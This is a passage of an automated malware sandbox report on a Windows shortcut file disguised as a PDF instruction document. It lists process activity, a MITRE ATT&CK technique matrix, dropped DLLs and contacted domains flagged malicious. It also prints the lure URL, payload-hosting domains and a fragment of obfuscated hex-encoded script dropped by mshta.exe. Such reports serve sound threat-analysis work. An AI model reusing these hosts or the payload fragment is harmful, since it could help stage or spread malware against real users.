Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\47bf4b68-9869-4c05-af58-4f757fe9302b.zip VolumeInformation

Source: C:\Windows\System32\OpenSSH\ssh.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 Registry Run Keys / Startup Folder	11 Process Injection	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	21 Virtualization/Sandbox Evasion	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 PowerShell	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Extra Window Memory Injection	1 Rundll32	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Extra Window Memory Injection	Cached Domain Credentials	15 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Source	Detection	Scanner	Label	Link
https://download-695-18811-018-webdav-logicaldoc.cdn-serveri4731-ns.shop/Documents/Instruction_695-18014-012_Rev.PDF.lnk	0%	Avira URL Cloud	safe

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\mv44vish.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\mv44vish.dll	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\MOG_Framework_2.2.14_vc10.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\Microsoft.AspNetCore.Razor.Language.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\Microsoft.Azure.Management.Storage.Fluent.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\Microsoft.NET.Sdk.Publish.Tasks.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\Microsoft.TestPlatform.VsTestConsole.TranslationLayer.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\Microsoft.VisualStudio.Setup.Download.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\Microsoft.VisualStudio.VisualC.Utilities.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\WRServices.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\WzWXFmfire64.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\_Fs.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\libmp4_plugin.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\mc_dec_mp2v.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\mc_mfimport.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\mlib_image.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\47bf4b68-9869-4c05-af58-4f757fe9302b\msvcp80.dll	0%	ReversingLabs

Name	IP	Active	Malicious	Reputation
download-695-18811-018-webdav-logicaldoc.cdn-serveri4731-ns.shop	104.21.87.24	true	false	unknown
flac.mindful-journal.shop	172.67.219.192	true	true	unknown
static.klipmybekoe.shop	104.21.80.60	true	true	unknown
www.google.com	142.250.181.68	true	false	high
klippetamea8.shop	104.21.92.22	true	false	unknown
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	84.201.211.22	true	false	high
klipmybekoe.shop	104.21.80.60	true	true	unknown
s3-eu-north-1.travelguide-techtrends.com	104.21.70.44	true	true	unknown
windows.msn.com	unknown	unknown	false	unknown
XKZCtENCHPCpteQS.XKZCtENCHPCpteQS	unknown	unknown	false	unknown
x1.i.lencr.org	unknown	unknown	false	high
www.irs.gov	unknown	unknown	false	unknown
ntp.msn.com	unknown	unknown	false	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.217.19.227	unknown	United States	15169	GOOGLEUS	false
1.1.1.1	unknown	Australia	13335	CLOUDFLARENETUS	true
172.217.17.35	unknown	United States	15169	GOOGLEUS	false
172.217.17.46	unknown	United States	15169	GOOGLEUS	false
104.21.87.24	download-695-18811-018-webdav-logicaldoc.cdn-serveri4731-ns.shop	United States	13335	CLOUDFLARENETUS	false
104.114.72.170	unknown	United States	20940	AKAMAI-ASN1EU	false
172.67.219.192	flac.mindful-journal.shop	United States	13335	CLOUDFLARENETUS	true
84.201.211.22	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	Poland	34390	NPLAYTELEKOM-AS-PONPL	false
104.78.188.188	unknown	United States	16625	AKAMAI-ASUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
104.21.80.60	static.klipmybekoe.shop	United States	13335	CLOUDFLARENETUS	true
52.6.155.20	unknown	United States	14618	AMAZON-AESUS	false
142.250.181.68	www.google.com	United States	15169	GOOGLEUS	false
64.233.162.84	unknown	United States	15169	GOOGLEUS	false
23.195.39.65	unknown	United States	20940	AKAMAI-ASN1EU	false
172.64.41.3	unknown	United States	13335	CLOUDFLARENETUS	false
204.79.197.203	unknown	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
2.18.80.170	unknown	European Union	6762	SEABONE-NETTELECOMITALIASPARKLESpAIT	false

Private

IP
192.168.2.18

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573288
Start date and time:	2024-12-11 19:12:22 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowsinteractivecookbook.jbs
Sample URL:	https://download-695-18811-018-webdav-logicaldoc.cdn-serveri4731-ns.shop/Documents/Instruction_695-18014-012_Rev.PDF.lnk
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	EGA enabled
Analysis Mode:	stream
Detection:	MAL
Classification:	mal100.troj.expl.evad.win@82/84@16/105

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Excluded IPs from analysis (whitelisted): 172.217.19.227, 172.217.17.46, 64.233.162.84
Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, clientservices.googleapis.com, clients.l.google.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Timeout during stream target processing, analysis might miss dynamic analysis data
VT rate limit hit for: https://download-695-18811-018-webdav-logicaldoc.cdn-serveri4731-ns.shop/Documents/Instruction_695-18014-012_Rev.PDF.lnk

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	476
Entropy (8bit):	4.957552463005916
Encrypted:	false
SSDEEP:
MD5:	09F0E60FB76A6CF6E38D64BE72F6AC81
SHA1:	0D394EC464ABD8B7027B76758CD1CD1FF53FB9EA
SHA-256:	60D0C8954D3073832F58ECEBA95F6FF35C6244FA4F7147259129E2C8E7982AA8
SHA-512:	5D9827657C8568AEBB80A7472E58483A1DDD33DA6AC75A3C2788B88ABE96F30E7C7FAEDACB442692252441D3F1BC784176BA06EBB9DB2FFCB47C2736F835C24D
Malicious:	false
Reputation:	unknown
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341148831376991","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":148280},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.18","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	94379856
Entropy (8bit):	4.2974771965057785
Encrypted:	false
SSDEEP:
MD5:	4A07192AC8A18D0A148D1EC12F27F9CB
SHA1:	B572E92CC05830D238FD5947C012659B8217C344
SHA-256:	984993A5F7A451238A1858C73B395676269DCD8D56C4452B46E74E7511DBB596
SHA-512:	167375406A9BEB39628A2B356604AFF51E6E81BBF96891E2BD5910EC421A603FB1B9BE7485A49D030B5E445CD4BBD97CCB70A40F16FC0465FF0BB2ECEF15A2A9
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...x...B...8............@.......................... ......:.....@.................................@...........6...............p....`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc...6...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\System32\mshta.exe
File Type:	data
Category:	dropped
Size (bytes):	295212
Entropy (8bit):	2.579243531352083
Encrypted:	false
SSDEEP:
MD5:	D49CE4D8703049EADE3ED73FB6ED279F
SHA1:	DDB6FA00F2A9A5D93A3DBABAA789ABDF86DBAE88
SHA-256:	ECC585D1E35632A443DEEBA78E30BE58B56457BB641D4BEB36CBB27F41857ADE
SHA-512:	4ED4507F9505FD384DE22EDA22E3E9AF2893F031146A55C51257438C8A4413E60D383676446AD20D93AB7157A3BDE05FF907FC1C21EEB352E5E516EDDE31B0F4
Malicious:	false
Reputation:	unknown
Preview:	66s75T6eA63K74d69w6fe6eW20q74M50w45q55V46u66i28q71e61w6cR59X29h7bM76X61t72s20X64a41g58C64b3ds20r27c27s3bm66K6fA72N20z28i76R61A72Q20L66I76A57F47r58q45S20n3db20v30U3bg66f76v57G47R58F45V20y3cT20O71T61F6cN59d2eH6cX65q6eQ67w74j68F3bg20w66M76l57s47S58j45p2bj2bn29R7bv76I61M72H20O4au53w58t4eM72T4eg20B3dr20C53n74b72k69S6ec67X2ee66M72O6fz6di43j68U61Z72m43m6fI64k65b28C71J61E6cQ59A5bI66w76U57C47W58m45z5dv20U2di20E37q37y32X29H3bQ64m41i58u64M20Y3df20Z64X41G58Z64L20w2bZ20p4as53i58L4ek72J4ef7dC72c65q74b75z72n6eO20m64U41w58o64k7dc3bL76P61b72K20D64c41d58X64x20v3dw20b74D50V45f55p46W66f28O5bN38b38N34K2cs38S38N33k2cQ38m39C31K2cl38a37T33O2ca38R38X36H2cH38g38I37F2cg38t37A36v2cS38j37w33x2cQ38Z38X30B2cx38E38j30s2cq38r31M38k2cu38k37K33B2ck38G39E32X2cy38Y37G33g2cS38I30d34y2cR38R31R37h2cq38F39u31M2cC38S30R34V2ci38f32Q31P2cU38Y30L34w2cj38z31L37M2ce38Y37z33r2cS38q38i34o2cb38k30a34Z2ca38f35t37p2cq38y38y32S2co38j38p36S2cH38q37M33u2cw38h38P37S2cF38F38C38S2cF38C38t36M2cj38c37u37x2cF38r37p31p2ce38W38F38k2cA38t37X33v2cj3

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11572
Entropy (8bit):	5.390717153477531
Encrypted:	false
SSDEEP:
MD5:	C10A1E085BF5F189F4557DB1648806F3
SHA1:	2772D1B430813C73C85B2E5A43A1E2FF503D0CC1
SHA-256:	42EF3D8501BA38D7720E08A3D2CFAB6DC1F0D513DFB59876748BD219C9A75FE4
SHA-512:	76F93B8E28D18E82437102390BB07C2D4F32B86064E50EEA659BE75B4A8937E66B6B58BDBF53E9B7666DC3F18E99CA16F5049C2C1DB12EDF5F27E1ADFFC847FD
Malicious:	false
Reputation:	unknown
Preview:	@...e...........b....................................@..........H...............o..b~.D.poM...%..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....5.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.............................................V.@..?@...@.X.@.J.@.Z.@.^.@.aT@.[T@..T@..S@.....{T@..S@..T@..S@._.@..T@..T@.VX@.UX@./T@..S@..T@.1T@.

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	ASCII text, with very long lines (552), with CRLF line terminators
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	DF17D7F692D04DD1E47C997C88920135
SHA1:	452B297F1226464F8A5653818BA3C895FD0EBB13
SHA-256:	0EDCBC537E414848A2D8BC41BC2E8571FC49B1B97F9A224A9A31472A239E5B35
SHA-512:	3FEF67EBAF2ED1D1519B13750A3450075A514076258D9FC4D0D97B0F1C2090AF3A00F7FC598193F4769222FA5FBA815EFF0879A46D42EBE228E87F042DEDFB13
Malicious:	false
Reputation:	unknown
